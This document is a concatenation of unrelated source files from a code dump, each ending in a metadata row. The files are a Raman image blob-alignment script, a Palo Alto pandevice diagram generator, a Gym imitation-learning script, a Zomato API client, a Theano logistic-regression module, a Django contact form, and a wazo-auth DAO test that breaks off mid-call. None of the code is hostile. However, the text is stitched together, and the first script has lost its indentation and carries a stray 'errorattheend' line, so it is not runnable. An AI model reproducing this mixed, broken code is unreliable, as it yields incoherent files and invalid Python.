l_mask=[cv2.drawContours(np.zeros(ramannewshape, dtype='uint8'), contours, i, color=1, thickness=-1) for i in range(len(contours))]
l_imageinds=[numpy.where(mask==1) for mask in l_mask]
l_xycen=np.array([[image_of_x[imageinds].mean(), image_of_y[imageinds].mean()] for imageinds in l_imageinds])
indstomerge=sorted([(count2+count+1, count) for count, xy0 in enumerate(l_xycen) for count2, xy1 in enumerate(l_xycen[count+1:]) if ((xy0-xy1)**2).sum()<(dx_smp**2+dy_smp**2)/10.])[::-1]
#indstomerge has highest index first so merge going down
for indhigh, indlow in indstomerge:
imageinds=l_imageinds.pop(indhigh)
mask=l_mask.pop(indhigh)
l_mask[indlow][imageinds]=1#update only the masks and then update everythign else afterwards
l_imageinds=[numpy.where(mask==1) for mask in l_mask]
l_xycen=np.array([[image_of_x[imageinds].mean(), image_of_y[imageinds].mean()] for imageinds in l_imageinds])
for imageinds, mask in zip(l_imageinds, l_mask):
indsinblob=sorted(list(image_of_inds[imageinds]))
relx=(image_of_x[imageinds].max()-image_of_x[imageinds].min())/dx_smp
rely=(image_of_y[imageinds].max()-image_of_y[imageinds].min())/dy_smp
if relx<0.5 or relx>1.4 or rely<0.5 or rely>1.4 or len(indsinblob)<ntot*0.5 or len(indsinblob)>ntot*1.5:
print 'skipped blob that was %.2f, %.2f of expected size with %d pixels' %(relx, rely, len(indsinblob))
continue
if numpy.any(mapfill[imageinds]==1):
print 'overlapping blobs detected'
xc=image_of_x[imageinds].mean()
yc=image_of_y[imageinds].mean()
mapfill[imageinds]=1
blobd[(xc, yc)]=indsinblob
plt.clf()
ramanimshow(mapfill)
plt.savefig(pathd['mapfill'])
plt.show()
with open(pathd['blobd'], mode='wb') as f:
pickle.dump(blobd, f)
alignui.knownblobsdict=blobd
alignui.openAddFile(p=r'J:\hte_jcap_app_proto\map\0084-04-0100-mp.txt')
alignui.image=rgbimagedata
alignui.motimage_extent=extent #left,right,bottom,top in mm
alignui.reloadimagewithextent()
#alignui.plotw_motimage.axes.imshow(alignui.image, origin='lower', interpolation='none', aspect=1, extent=alignui.motimage_extent)
xarr, yarr=np.array(blobd.keys()).T
alignui.plotw_motimage.axes.plot(xarr, yarr, 'wx', ms=4)
alignui.plotw_motimage.fig.canvas.draw()
alignui.exec_()
alignui.sampleLineEdit.setText('1850,1851,1852,1853,1854,1855,1905,1906,1907,1908,1909,1910,1911,1912,1913,1914,1915,1916,1917,1918,1919,1969,1970,1971,1972,1973,1974,1975,1976,1977,1978,1979,1980,1981,1982,1983,2033,2034,2035,2036,2037,2038,2039,2040,2041,2042,2043,2044,2045,2046,2047,2097,2098,2099,2100,2101,2102,2103,2104,2105,2106,2107,2108,2109,2110,2111')
alignui.addValuesSample()
alignui.exec_()
alignui.plotw_motimage.fig.savefig(pathd['alignedsamples'])
with open(pathd['alignedsamplestxt'], mode='w') as f:
f.write(str(alignui.browser.toPlainText()))
alignui.openpckinfo(p=pathd['infopck'])
alignui.infox/=1000.
alignui.infoy/=1000.
alignui.perform_genmapfile(p=pathd['map'], **default_sample_blob_dict)
mapfill2=np.zeros(ramaninfod['number of spectra'], dtype='uint8')
for smp, inds in alignui.smp_inds_list__map:
mapfill2[inds]=2 if smp>0 else 1
mapfill2=ramanreshape(mapfill2)
plt.clf()
ramanimshow(mapfill2, vmin=0, vmax=2, cmap='gnuplot')
plt.savefig(pathd['samplepixels'])
plt.show()
parseui.savepathLineEdit.setText(pathd['spectrafolder'])
parseui.match(copypath=pathd['map'])
parseui.extract()
parseui.saveave()
#parseui.readresultsfolder()
parseui.exec_()
errorattheend
| bsd-3-clause | 5,611,586,650,156,254,000 | 39.10596 | 363 | 0.693692 | false |
PaloAltoNetworks-BD/SplunkforPaloAltoNetworks | Splunk_TA_paloalto/bin/lib/pandevice/docs/configtree.py | 2 | 5431 | #!/usr/bin/env python
# Copyright (c) 2016, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# Author: Brian Torres-Gil <[email protected]>
"""Generate class diagram from module and class source code"""
import os
import sys
import pkgutil
import inspect
import errno
header = """digraph configtree {
graph [rankdir=LR, fontsize=10, margin=0.001];
node [shape=box, fontsize=10, height=0.001, margin=0.1, ordering=out];"""
footer = "}\n"
nodestyle = {
# 'Firewall': '',
# 'Panorama': '',
'device': 'fillcolor=lightpink',
'firewall': 'fillcolor=lightblue',
'ha': 'fillcolor=lavender',
'network': 'fillcolor=lightcyan',
'objects': 'fillcolor=lemonchiffon',
'policies': 'fillcolor=lightsalmon',
'panorama': 'fillcolor=darkseagreen2',
}
def mkdir_p(path):
"""Make a full directory path"""
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def node_style(cls):
cls = str(cls)
style = ""
if "." in cls:
module = cls.split(".")[0]
cls_name = cls.split(".")[-1]
try:
style = "style=filled " + nodestyle[cls_name] + " "
except KeyError:
try:
style = "style=filled " + nodestyle[module] + " "
except:
pass
result = " {0} [{1}URL=\"../module-{2}.html#pandevice.{3}\" target=\"_top\"];\n".format(
cls_name, style, module, cls
)
else:
if style:
result = " {0} [{1}]\n".format(style)
else:
result = ""
return result
def legend(modules):
result = []
result.append("graph configtree {\n")
result.append(" graph [fontsize=10, margin=0.001];\n")
result.append(" node [shape=box, fontsize=10, height=0.001, margin=0.1, ordering=out];\n")
for module in modules:
module_name = module.__name__.split(".")[-1]
try:
result.append(" {0} [style=filled {1}]\n".format(module_name, nodestyle[module_name]))
except KeyError:
pass
#result.append(" PanDevice [style=filled]\n")
result.append("}\n")
return result
def create_object_diagram(directory=None):
# Set paths to package and modules
curdir = os.path.dirname(os.path.abspath(__file__))
rootpath = [os.path.join(curdir, os.pardir)]
libpath = [os.path.join(curdir, os.pardir, 'pandevice')]
sys.path[:0] = rootpath
sys.path[:0] = libpath
#print "Looking for pandevice in path: %s" % libpath
# Import all modules in package
modules = []
for importer, modname, ispkg in pkgutil.iter_modules(path=libpath,
prefix="pandevice."):
modules.append(__import__(modname, fromlist="dummy"))
output = {}
output["legend"] = legend(modules)
# Gather a list of all classes in all modules
for module in modules:
module_name = module.__name__
output[module_name] = []
classes_seen = []
for class_name, cls in inspect.getmembers(module, inspect.isclass):
if hasattr(cls, "CHILDTYPES") and getattr(cls, "CHILDTYPES"):
full_class_name = "{0}.{1}".format(module_name.split(".")[-1], class_name)
if full_class_name not in classes_seen:
classes_seen.append(full_class_name)
output[module_name].append(node_style(full_class_name))
children = list(getattr(cls, "CHILDTYPES"))
children.sort()
for child in children:
child_module = child.split(".")[0]
child_name = child.split(".")[-1]
#if child_name == "IPv6Address":
#continue
if child not in classes_seen:
classes_seen.append(child)
output[module_name].append(node_style(child))
output[module_name].append(" {0} -> {1};\n".format(class_name, child_name))
# Write output to file or stdout
path = ""
if directory is not None:
mkdir_p(directory)
path = directory + "/"
for module, lines in output.items():
if not lines:
continue
moduleout = "".join(lines)
if module == "legend":
fulloutput = moduleout
else:
fulloutput = header + moduleout + footer
with open("{0}{1}.dot".format(path, module), 'w') as file:
file.write(fulloutput)
if __name__ == "__main__":
create_object_diagram()
| isc | -6,384,867,889,624,848,000 | 32.732919 | 101 | 0.579635 | false |
pashadude/TensorflowReinforcementLearning | hw1/imitation_learning.py | 1 | 2947 | import gym
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import pickle
import tensorflow as tf
import tf_util
import argparse
import tqdm
def main():
parser = argparse.ArgumentParser()
parser.add_argument('env', type=str)
args = parser.parse_args()
inputs, outputs, evaluations = extract_imitation(args.env)
model = train_regressor(inputs, outputs)
run_regressor(evaluations, model, args.env)
def extract_imitation(env):
dic_data = pickle.loads(open('imitation/original/{}.pkl'.format(env), 'rb').read())
inputs = np.array(dic_data['observations'])
outputs = np.array(dic_data['actions'])
evaluations = pd.DataFrame({'steps': dic_data['steps'], 'expert returns': dic_data['returns']})
return inputs, outputs, evaluations
def train_regressor(inputs, outputs, layers=[64, 64], activation_function=tf.nn.tanh, batch_size=10,
epochs=1000, steps=10000):
inputs_dim = inputs.shape[1]
feature_columns = [tf.contrib.layers.real_valued_column("", dimension=inputs_dim)]
outputs_dim = outputs.shape[2]
estimator = tf.contrib.learn.DNNRegressor(
feature_columns=feature_columns,
hidden_units=layers,
activation_fn=activation_function,
label_dimension=outputs_dim
)
input_fn = tf.contrib.learn.io.numpy_input_fn({"": inputs}, outputs[:, 0, :],
batch_size=batch_size, num_epochs=epochs)
estimator.fit(input_fn=input_fn, steps=steps)
return estimator
def run_regressor(expert_data, model, env_name, num_rollouts=20, render=False):
returns = []
observations = []
actions = []
steps_numbers = []
with tf.Session():
env = gym.make(env_name)
max_steps = env.spec.timestep_limit
tf_util.initialize()
for i in tqdm.tqdm(range(num_rollouts)):
obs = env.reset()
done = False
totalr = 0.
steps = 0
while not done:
action = model.predict(obs[None, :], as_iterable=False)
observations.append(obs)
actions.append(action)
obs, r, done, _ = env.step(action)
totalr += r
steps += 1
if render:
env.render()
if steps >= max_steps:
break
steps_numbers.append(steps)
returns.append(totalr)
model_data = {'observations': np.array(observations),
'actions': np.array(actions),
'returns': np.array(returns),
'steps': np.array(steps_numbers)}
expert_data['model returns'] = pd.Series(model_data['returns'], index=expert_data.index)
pickle.dump(model_data, open('imitation/tnn_imitation/{}.pkl'.format(env_name), 'wb+'))
return
if __name__ == '__main__':
main()
| mit | 6,587,941,237,247,342,000 | 33.267442 | 100 | 0.587377 | false |
screwgoth/JugheadBot | hotels/zomat.py | 1 | 6039 | import os
import logging
import requests
import json
class Zomat(object):
"""
Fetch data using the Zomato API
"""
def __init__(self):
logging.basicConfig(level=logging.INFO)
self.logger = logging.getLogger("Zomat")
self.userKey = os.environ.get("USER_KEY")
self.headers = {"Accept":"application/json", "user-key": self.userKey}
def getLocation(self, location):
"""
Get Zomato entity_id and entity_type
"""
entity_id = 0
entity_type = str()
self.logger.info("Looking up for location : %s", location)
search_url = "https://developers.zomato.com/api/v2.1/locations?query="+location
search_resp = requests.get(search_url,headers=self.headers)
search_resp_dict = json.loads(search_resp.text)
loc_sug_list = search_resp_dict['location_suggestions']
for loc_sug in loc_sug_list:
entity_type = loc_sug["entity_type"]
entity_id = loc_sug["entity_id"]
if entity_id and entity_type:
self.logger.info("entity_id = %d, entity_type = %s", entity_id, entity_type)
return entity_id, entity_type
def getBestRestaurants(self, entity_id, entity_type, cuisine_id = 0):
restaurant_list = []
if cuisine_id == 0:
self.logger.info("No specific cuisine")
zomato_url = "https://developers.zomato.com/api/v2.1/search?entity_id="+str(entity_id)+"&entity_type="+str(entity_type)+"&count=5&sort=rating&order=desc"
else:
self.logger.info("Finding Restaurants as per cuisines")
zomato_url = "https://developers.zomato.com/api/v2.1/search?entity_id="+str(entity_id)+"&entity_type="+str(entity_type)+"&count=5&radius=5000&cuisines="+str(cuisine_id)+"&sort=rating&order=desc"
resp = requests.get(zomato_url,headers=self.headers)
resp_dict = json.loads(resp.text)
restaurants = (resp_dict['restaurants'])
print ("Top 5 restaurants : ",restaurants)
for i in restaurants:
zomato_dict = {}
zomato_dict['fbcard_name'] = i['restaurant']['name']
zomato_dict['fbcard_subtitle'] = i['restaurant']['location']['address']
zomato_dict['fbcard_url'] = i['restaurant']['url']
zomato_dict['fbcard_photo'] = i['restaurant']['featured_image']
zomato_dict['button_url'] = i['restaurant']['menu_url']
zomato_dict['button_title'] = "Restaurant Menu"
restaurant_list.append(zomato_dict)
return restaurant_list
def getCityID(self, city):
"""
Get Zomato ID and other info for a City
"""
city_id = 0
zomato_url = "https://developers.zomato.com/api/v2.1/cities?q="+city
resp = requests.get(zomato_url,headers=self.headers)
resp_dict = json.loads(resp.text)
# Assuming there is only one entry for this City
city_id = resp_dict['location_suggestions'][0]['id']
self.logger.info("For City : %s, got city_id = %d", city, city_id)
return city_id
def getCuisineID(self, city, cuisine):
"""
Get the Zomate Cuisine ID
"""
city_id = self.getCityID(city)
if city_id != 0:
zomato_url = "https://developers.zomato.com/api/v2.1/cuisines?city_id="+str(city_id)
resp = requests.get(zomato_url,headers=self.headers)
resp_dict = json.loads(resp.text)
cusines = (resp_dict['cuisines'])
for zcuisine in cusines:
if cuisine.lower() == zcuisine['cuisine']['cuisine_name'].lower():
self.logger.info("For Cuisine : %s, cuisine_id = %d", cuisine, zcuisine['cuisine']['cuisine_id'])
return zcuisine['cuisine']['cuisine_id']
# Cuisine not found
self.logger.info("Cuisine, %s, not found for city %s", cuisine, city)
return 0
def getReviews(self, res_name, entity_id = 0, entity_type = ""):
"""
Get the review for the specified Restaurant
"""
self.logger.info("Restaurant review for : %s", res_name)
res_review = []
res_id = 0
if entity_id == 0 and not entity_type:
zomato_url = "https://developers.zomato.com/api/v2.1/search?q="+res_name
else:
zomato_url = "https://developers.zomato.com/api/v2.1/search?entity_id="+str(entity_id)+"&entity_type="+entity_type+"&q="+res_name
resp = requests.get(zomato_url,headers=self.headers)
resp_dict = json.loads(resp.text)
restaurants = (resp_dict['restaurants'])
#print ("Found restaurants : ",restaurants)
for r in restaurants:
print (r['restaurant']['name'])
# Sometimes the queries will contains results where the Restaurant
# name is part of the address. So check specifically for the name
if res_name == r['restaurant']['name']:
zomato_dict = {}
res_id = r['restaurant']['R']['res_id']
self.logger.info("For %s, Restaurant ID = %d", res_name, res_id)
zomato_dict['fbcard_name'] = r['restaurant']['name']
zomato_dict['fbcard_subtitle'] = "Votes : " + str(r['restaurant']['user_rating']['votes']) + "\n" + "Average Cost for Two : " + str(r['restaurant']['average_cost_for_two'])
zomato_dict['fbcard_url'] = r['restaurant']['url']
zomato_dict['fbcard_photo'] = r['restaurant']['featured_image']
menu_url = r['restaurant']['menu_url']
review_url = menu_url.replace("menu", "reviews", 1)
#self.logger.info("Review URL = %s", review_url)
zomato_dict['button_url'] = review_url
zomato_dict['button_title'] = "Rating: " + r['restaurant']['user_rating']['aggregate_rating'] + "/5 (" + r['restaurant']['user_rating']['rating_text'] + ")"
res_review.append(zomato_dict)
return res_review
| mit | -1,231,327,285,772,152,800 | 46.179688 | 206 | 0.580229 | false |
yifeng-li/DECRES | logistic_sgd.py | 1 | 15395 | """
A module of multilayer perceptrons modified from the Deep Learning Tutorial.
This implementation is based on Theano and stochastic gradient descent.
Copyright (c) 2008-2013, Theano Development Team All rights reserved.
Modified by Yifeng Li
CMMT, UBC, Vancouver
Sep 23, 2014
Contact: [email protected]
"""
from __future__ import division
import pickle
import time
import math
import copy
import numpy
numpy.warnings.filterwarnings('ignore') # Theano causes some warnings
import theano
import theano.tensor as T
import classification as cl
class LogisticRegression(object):
"""
Multi-class logistic regression class.
"""
def __init__(self, input, n_in, n_out):
""" Initialize the parameters of the logistic regression
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
"""
# initialize with 0 the weights W as a matrix of shape (n_in, n_out)
self.W = theano.shared(value=numpy.zeros((n_in, n_out),
dtype=theano.config.floatX),
name='W', borrow=True)
# initialize the baises b as a vector of n_out 0s
self.b = theano.shared(value=numpy.zeros((n_out,),
dtype=theano.config.floatX),
name='b', borrow=True)
# compute vector of class-membership probabilities in symbolic form
self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)
# compute prediction as class whose probability is maximal in
# symbolic form
self.y_pred = T.argmax(self.p_y_given_x, axis=1) # labels
self.y_pred_prob=T.max(self.p_y_given_x,axis=1) # probabilities
# parameters of the model
self.params = [self.W, self.b]
def negative_log_likelihood(self, y):
"""Return the mean of the negative log-likelihood of the prediction
of this model under a given target distribution.
.. math::
\frac{1}{|\mathcal{D}|} \mathcal{L} (\theta=\{W,b\}, \mathcal{D}) =
\frac{1}{|\mathcal{D}|} \sum_{i=0}^{|\mathcal{D}|} \log(P(Y=y^{(i)}|x^{(i)}, W,b)) \\
\ell (\theta=\{W,b\}, \mathcal{D})
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
Note: we use the mean instead of the sum so that
the learning rate is less dependent on the batch size
"""
# y.shape[0] is (symbolically) the number of rows in y, i.e.,
# number of examples (call it n) in the minibatch
# T.arange(y.shape[0]) is a symbolic vector which will contain
# [0,1,2,... n-1] T.log(self.p_y_given_x) is a matrix of
# Log-Probabilities (call it LP) with one row per example and
# one column per class LP[T.arange(y.shape[0]),y] is a vector
# v containing [LP[0,y[0]], LP[1,y[1]], LP[2,y[2]], ...,
# LP[n-1,y[n-1]]] and T.mean(LP[T.arange(y.shape[0]),y]) is
# the mean (across minibatch examples) of the elements in v,
# i.e., the mean log-likelihood across the minibatch.
return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])
def get_predicted(self,data):
"""
Get the class labels and probabilities given data.
"""
p_y_given_x = T.nnet.softmax(T.dot(data, self.W) + self.b)
y_pred = T.argmax(p_y_given_x, axis=1)
y_pred_prob = T.max(p_y_given_x, axis=1)
return y_pred,y_pred_prob
def errors(self, y):
"""Return a float representing the number of errors in the minibatch
over the total number of examples of the minibatch ; zero one
loss over the size of the minibatch
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
"""
# check if y has same dimension of y_pred
if y.ndim != self.y_pred.ndim:
raise TypeError('y should have the same shape as self.y_pred',
('y', target.type, 'y_pred', self.y_pred.type))
# check if y is of the correct datatype
if y.dtype.startswith('int'):
# the T.neq operator returns a vector of 0s and 1s, where 1
# represents a mistake in prediction
return T.mean(T.neq(self.y_pred, y))
else:
raise NotImplementedError()
def get_params(self):
return copy.deepcopy(self.params)
def set_params(self, given_params):
self.params=given_params
def print_params(self):
for param in self.params:
print param.get_value(borrow=True)
def save_params(self,filename):
f=open(filename,'w') # remove existing file
f.close()
f=open(filename,'a')
for param in self.params:
pickle.dump(param.get_value(borrow=True),f)
f.close()
def read_params(filename):
f=open(filename,'r')
params=pickle.load(f)
f.close()
return params
def train_model(learning_rate=0.1, n_epochs=1000,
train_set_x_org=None,train_set_y_org=None,valid_set_x_org=None,valid_set_y_org=None,
batch_size=100):
"""
Train the logistic regression model.
INPUTS:
learning_rate: float scalar, the initial learning rate.
n_epochs: int scalar, the maximal number of epochs.
train_set_x_org: numpy 2d array, each row is a training sample.
train_set_y_org: numpy vector of type int {0,1,...,C-1}, class labels of training samples.
valid_set_x_org: numpy 2d array, each row is a validation sample.
This set is to monitor the convergence of optimization.
valid_set_y_org: numpy vector of type int {0,1,...,C-1}, class labels of validation samples.
batch_size: int scalar, minibatch size.
OUTPUTS:
classifier: object of logisticRegression, the model learned, returned for testing.
training_time: float, training time in seconds.
"""
train_set_x = theano.shared(numpy.asarray(train_set_x_org,dtype=theano.config.floatX),borrow=True)
train_set_y = T.cast(theano.shared(numpy.asarray(train_set_y_org,dtype=theano.config.floatX),borrow=True),'int32')
valid_set_x = theano.shared(numpy.asarray(valid_set_x_org,dtype=theano.config.floatX),borrow=True)
valid_set_y = T.cast(theano.shared(numpy.asarray(valid_set_y_org,dtype=theano.config.floatX),borrow=True),'int32')
# compute number of minibatches for training, validation and testing
#n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
#n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size
n_train_batches = int(math.ceil(train_set_x.get_value(borrow=True).shape[0] / batch_size))
n_valid_batches = int(math.ceil(valid_set_x.get_value(borrow=True).shape[0] / batch_size))
# shared variable to reduce the learning rate
learning_rate_shared=theano.shared(learning_rate,name='learn_rate_shared')
#learning_rate_init=T.scalar(name='learning_rate_init',dtype=theano.config.floatX)
#epoch_variable=T.iscalar(name='epoch_variable')
decay_rate=T.scalar(name='decay_rate',dtype=theano.config.floatX)
#compute_learn_rate=theano.function([learning_rate_init,epoch_variable,decay_rate],learning_rate_shared, \
#updates=[(learning_rate_shared,learning_rate_init*decay_rate**(epoch_variable//100))]) # thenao does not support math.pow, instead use T.pow() or a**b
reduce_learning_rate=theano.function([decay_rate],learning_rate_shared,updates=[(learning_rate_shared,learning_rate_shared*decay_rate)])
# define the model
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
x = T.matrix('x') # each row is a sample
y = T.ivector('y') # the labels are presented as 1D vector of [int] labels
num_feat=train_set_x.get_value(borrow=True).shape[1]
#print train_set_y.get_value()
n_cl=len(numpy.unique(train_set_y_org))
classifier = LogisticRegression(input=x, n_in=num_feat, n_out=n_cl)
# the cost we minimize during training is the negative log likelihood of
# the model in symbolic format
cost = classifier.negative_log_likelihood(y)
# compiling a Theano function that computes the mistakes that are made by
# the model on a minibatch
validate_model = theano.function(inputs=[index],
outputs=classifier.errors(y),
givens={
x: valid_set_x[index * batch_size:(index + 1) * batch_size],
y: valid_set_y[index * batch_size:(index + 1) * batch_size]})
validate_model2 = theano.function(inputs=[],
outputs=classifier.errors(y),
givens={
x: valid_set_x,
y: valid_set_y})
validate_model3 = theano.function(inputs=[],
outputs=classifier.y_pred,
givens={x:valid_set_x})
# compute the gradient of cost with respect to theta = (W,b)
g_W = T.grad(cost=cost, wrt=classifier.W)
g_b = T.grad(cost=cost, wrt=classifier.b)
# specify how to update the parameters of the model as a list of
# (variable, update expression) pairs.
updates = [(classifier.W, classifier.W - learning_rate * g_W),
(classifier.b, classifier.b - learning_rate * g_b)]
# compiling a Theano function `train_model_one_iteration` that returns the cost, but in
# the same time updates the parameter of the model based on the rules
# defined in `updates`
train_model_one_iteration = theano.function(inputs=[index],
outputs=cost,
updates=updates,
givens={
x: train_set_x[index * batch_size:(index + 1) * batch_size],
y: train_set_y[index * batch_size:(index + 1) * batch_size]})
# training the model below
# early-stopping parameters
patience = 5000 # look as this many examples regardless
patience_increase = 2 # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
# go through this many
# minibatche before checking the network
# on the validation set; in this case we
# check every epoch
best_validation_loss = numpy.inf
max_num_epoch_change_learning_rate=100 # initial maximal number of epochs to change learning rate
max_num_epoch_not_improve=3*max_num_epoch_change_learning_rate # max number of epochs without improvmenet to terminate the optimization
max_num_epoch_change_rate=0.8 # change to max number of epochs to change learning rate
learning_rate_decay_rate=0.8
epoch_change_count=0
start_time = time.clock()
done_looping = False
epoch = 0
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
epoch_change_count=epoch_change_count+1
if epoch_change_count % max_num_epoch_change_learning_rate ==0:
reduce_learning_rate(learning_rate_decay_rate)
max_num_epoch_change_learning_rate= \
cl.change_max_num_epoch_change_learning_rate(max_num_epoch_change_learning_rate,max_num_epoch_change_rate)
max_num_epoch_not_improve=3*max_num_epoch_change_learning_rate
epoch_change_count=0
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_model_one_iteration(minibatch_index)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = [validate_model(i)
for i in xrange(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f %%' % \
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss * 100.))
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
num_epoch_not_improve=0
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
# save a copy of the currently best model parameter
best_model_params=classifier.get_params()
if patience <= iter:
done_looping = True
break
if this_validation_loss >= best_validation_loss:
num_epoch_not_improve=num_epoch_not_improve+1
if num_epoch_not_improve>=max_num_epoch_not_improve:
done_looping = True
break
# set the best model parameters
classifier.set_params(best_model_params)
end_time = time.clock()
training_time=end_time-start_time
print 'Training time: %f' %(training_time/60)
print 'Optimization complete with best validation score of %f,' %(best_validation_loss * 100.)
return classifier,training_time
def test_model(classifier_trained,test_set_x_org):
"""
Predict class labels of given data using the model learned.
INPUTS:
classifier_trained: object of logisticRegression, the model learned by function "train_model".
test_set_x_org: numpy 2d array, each row is a sample whose label to be predicted.
OUTPUTS:
y_predicted: numpy int vector, the class labels predicted.
test_set_y_predicted_prob: numpy float vector, the probabilities.
test_time: test time in seconds.
"""
start_time=time.clock()
test_set_x=theano.shared(numpy.asarray(test_set_x_org,dtype=theano.config.floatX),borrow=True)
data = T.matrix('data')
get_y_pred,get_y_pred_prob=classifier_trained.get_predicted(data)
test_model_func = theano.function(inputs=[data], outputs=[get_y_pred,get_y_pred_prob])
y_predicted,y_predicted_prob=test_model_func(test_set_x.get_value(borrow=True))
end_time=time.clock()
test_time=end_time-start_time
return y_predicted,y_predicted_prob,test_time
| bsd-3-clause | -6,817,652,860,176,498,000 | 42.611898 | 155 | 0.614875 | false |
mimischi/django-clock | clock/contact/forms.py | 1 | 1685 | # -*- coding: utf-8 -*-
from captcha.fields import ReCaptchaField
from crispy_forms.bootstrap import FormActions
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django import forms
from django.conf import settings
from django.core.mail import send_mail
from django.http import HttpResponseRedirect
from django.utils.translation import get_language
from django.utils.translation import ugettext_lazy as _
class ContactForm(forms.Form):
name = forms.CharField(max_length=200, label=_("Name"))
sender = forms.EmailField(label=_("E-Mail"))
message = forms.CharField(widget=forms.Textarea, label=_("Message"))
cc_myself = forms.BooleanField(
label=_("Send a copy of the mail to myself"), required=False
)
captcha = ReCaptchaField(attrs={"lang": get_language()})
def __init__(self, *args, **kwargs):
super(ContactForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_action = "."
self.helper.form_method = "post"
self.helper.form_class = "form-halfpage"
self.helper.layout.append(
FormActions(
Submit("submit", _("Submit"), css_class="btn btn-primary pull-right")
)
)
def send_mail(self, form):
message = form.cleaned_data["message"]
sender = form.cleaned_data["sender"]
cc_myself = form.cleaned_data["cc_myself"]
recipients = settings.CONTACT_FORM_RECIPIENT
if cc_myself:
recipients.append(sender)
send_mail(settings.CONTACT_FORM_SUBJECT, message, sender, recipients)
return HttpResponseRedirect("/thanks/")
| mit | 1,497,578,063,128,168,000 | 35.630435 | 85 | 0.667656 | false |
wazo-pbx/xivo-auth | integration_tests/suite/database/test_db_group.py | 1 | 7050 | # Copyright 2016-2021 The Wazo Authors (see the AUTHORS file)
# SPDX-License-Identifier: GPL-3.0-or-later
from hamcrest import (
assert_that,
calling,
contains,
contains_inanyorder,
empty,
equal_to,
has_entries,
has_key,
has_properties,
)
from xivo_test_helpers.mock import ANY_UUID
from xivo_test_helpers.hamcrest.raises import raises
from wazo_auth import exceptions
from wazo_auth.database import models
from ..helpers import fixtures, base
TENANT_UUID = 'a26c4ed8-767f-463e-a10a-42c4f220d375'
class TestGroupDAO(base.DAOTestCase):
@fixtures.db.group()
@fixtures.db.policy()
def test_add_policy(self, group_uuid, policy_uuid):
assert_that(self._policy_dao.list_(group_uuid=group_uuid), empty())
self._group_dao.add_policy(group_uuid, policy_uuid)
result = self._policy_dao.list_(group_uuid=group_uuid)
assert_that(result, contains(has_properties(uuid=policy_uuid)))
self._group_dao.add_policy(group_uuid, policy_uuid) # twice
assert_that(
calling(self._group_dao.add_policy).with_args(
self.unknown_uuid, policy_uuid
),
raises(exceptions.UnknownGroupException),
'unknown group',
)
assert_that(
calling(self._group_dao.add_policy).with_args(
group_uuid, self.unknown_uuid
),
raises(exceptions.UnknownPolicyException),
'unknown policy',
)
@fixtures.db.group()
@fixtures.db.user()
def test_add_user(self, group_uuid, user_uuid):
assert_that(self._user_dao.list_(group_uuid=group_uuid), empty())
self._group_dao.add_user(group_uuid, user_uuid)
result = self._user_dao.list_(group_uuid=group_uuid)
assert_that(result, contains(has_entries(uuid=user_uuid)))
self._group_dao.add_user(group_uuid, user_uuid) # twice
assert_that(
calling(self._group_dao.add_user).with_args(self.unknown_uuid, user_uuid),
raises(exceptions.UnknownGroupException),
'unknown group',
)
assert_that(
calling(self._group_dao.add_user).with_args(group_uuid, self.unknown_uuid),
raises(exceptions.UnknownUserException),
'unknown user',
)
@fixtures.db.group(name='foo')
@fixtures.db.group(name='bar')
@fixtures.db.group(name='baz')
def test_count(self, *ignored):
result = self._group_dao.count()
assert_that(result, equal_to(3))
result = self._group_dao.count(name='foo', filtered=False)
assert_that(result, equal_to(3))
result = self._group_dao.count(search='ba', filtered=False)
assert_that(result, equal_to(3))
result = self._group_dao.count(name='foo', filtered=True)
assert_that(result, equal_to(1))
result = self._group_dao.count(search='ba', filtered=True)
assert_that(result, equal_to(2))
@fixtures.db.tenant(uuid=TENANT_UUID)
@fixtures.db.group(name='foobar', tenant_uuid=TENANT_UUID)
def test_create(self, tenant_uuid, group_uuid):
name = 'foobar'
assert_that(group_uuid, equal_to(ANY_UUID))
filter_ = models.Group.uuid == group_uuid
group = self.session.query(models.Group).filter(filter_).first()
assert_that(group, has_properties(name=name, tenant_uuid=tenant_uuid))
assert_that(
calling(self._group_dao.create).with_args(
